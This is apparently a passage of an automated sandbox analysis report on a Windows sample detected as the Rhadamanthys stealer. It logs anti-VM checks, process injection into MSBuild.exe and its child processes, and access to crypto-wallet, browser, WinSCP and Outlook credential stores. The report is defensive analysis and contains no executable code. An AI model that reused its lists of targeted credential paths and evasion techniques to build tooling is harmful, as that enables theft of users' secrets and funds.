Source: dialer.exe, 00000005.00000002.1994333377.0000000002978000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: OpenWith.exe, 0000000F.00000003.2042892302.000001F0D743A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMCIDevSymbolf
Source: wmplayer.exe, 00000010.00000002.2882270249.00000203433F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWQ
Source: dialer.exe, 00000005.00000003.1934769024.0000000004DD0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DisableGuestVmNetworkConnectivity
Source: nF54KOU30R.exe, 00000000.00000002.1982036347.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW O
Source: nF54KOU30R.exe, 00000000.00000003.1916214760.0000000001000000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000002.1982141598.0000000001000000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000005.00000002.1994333377.0000000002978000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000010.00000002.2882270249.00000203433F7000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000011.00000002.2881521633.000001D3CF5FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: OpenWith.exe, 0000000F.00000003.2075439224.000001F0D7372000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLinkcLinkSymbolicLinkY
Source: dialer.exe, 00000005.00000003.1934769024.0000000004DD0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: EnableGuestVmNetworkConnectivity
Source: OpenWith.exe, 0000000F.00000003.2116414121.000001F0D737A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_die
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\nF54KOU30R.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\nF54KOU30R.exe Code function: 0_3_03DB22CC VirtualAlloc,VirtualAlloc,VirtualProtect,LdrInitializeThunk,VirtualFree, 0_3_03DB22CC
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\nF54KOU30R.exe Code function: 0_3_03DB2277 mov eax, dword ptr fs:[00000030h] 0_3_03DB2277
Source: C:\Windows\SysWOW64\dialer.exe Code function: 5_3_025D027F mov eax, dword ptr fs:[00000030h] 5_3_025D027F
Source: C:\Windows\System32\OpenWith.exe Code function: 15_2_000001F0D53B1A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler, 15_2_000001F0D53B1A90

HIPS / PFW / Operating System Protection Evasion
barindex
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\nF54KOU30R.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe Memory allocated: C:\Windows\System32\dllhost.exe base: 1D3CF5A0000 protect: page read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\nF54KOU30R.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\nF54KOU30R.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 452000 Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 462000 Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 46A000 Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 46B000 Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 46C000 Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 877008 Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe Memory written: C:\Windows\System32\dllhost.exe base: 1D3CF5A0000 Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe Memory written: C:\Windows\System32\dllhost.exe base: 7FF70F3314E0 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\nF54KOU30R.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe" Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe" Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe" Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe" Jump to behavior
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Windows\System32\OpenWith.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\dllhost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E574F83C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe, 15_3_00007DF4E574F83C
Source: C:\Users\user\Desktop\nF54KOU30R.exe Code function: 0_2_009C4675 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_009C4675
Source: C:\Windows\System32\OpenWith.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: dialer.exe, 00000005.00000002.1994750367.0000000002CF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OllyDbg.exe

Stealing of Sensitive Information
barindex
Yara detected RHADAMANTHYS Stealer
Source: Yara match File source: 00000005.00000003.1932913014.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.1959663003.0000000004B25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1935862914.0000000003720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1978957383.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1982803526.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1994856642.0000000004310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Found many strings related to Crypto-Wallets (likely being stolen)
Source: OpenWith.exe, 0000000F.00000003.2079637788.000001F0D7399000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Qtum-Electrum\config
Source: OpenWith.exe, 0000000F.00000003.2078385188.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\ElectronCash\config
Source: OpenWith.exe, 0000000F.00000003.2077419633.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\com.liberty.jaxx
Source: OpenWith.exe, 0000000F.00000003.2081933128.000001F0D7444000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Local\Exodus\exodus.wallet
Source: OpenWith.exe, 0000000F.00000003.2081434576.000001F0D7371000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: OpenWith.exe, 0000000F.00000003.2107739996.000001F0D7435000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: !%LOCALAPPDATA%\Ethereum\keystore\
Source: OpenWith.exe, 0000000F.00000003.2081933128.000001F0D7444000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Local\Exodus\exodus.wallet
Source: OpenWith.exe, 0000000F.00000003.2107739996.000001F0D7435000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Ethereum
Source: OpenWith.exe, 0000000F.00000003.2078385188.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Coinomi\Coinomi\wallets
Source: OpenWith.exe, 0000000F.00000003.2107739996.000001F0D7435000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: !%LOCALAPPDATA%\Ethereum\keystore\
Source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser\newtab Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\z6bny8rn.default Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsing Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\thumbnails Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsing\google4 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\trash16598 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: OpenWith.exe PID: 6012, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected RHADAMANTHYS Stealer
Source: Yara match File source: 00000005.00000003.1932913014.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.1959663003.0000000004B25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1935862914.0000000003720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1978957383.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1982803526.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1994856642.0000000004310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E57814B8 socket,bind, 15_3_00007DF4E57814B8
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E574F83C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe, 15_3_00007DF4E574F83C
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_000002034328CDEC CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe, 16_2_000002034328CDEC
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
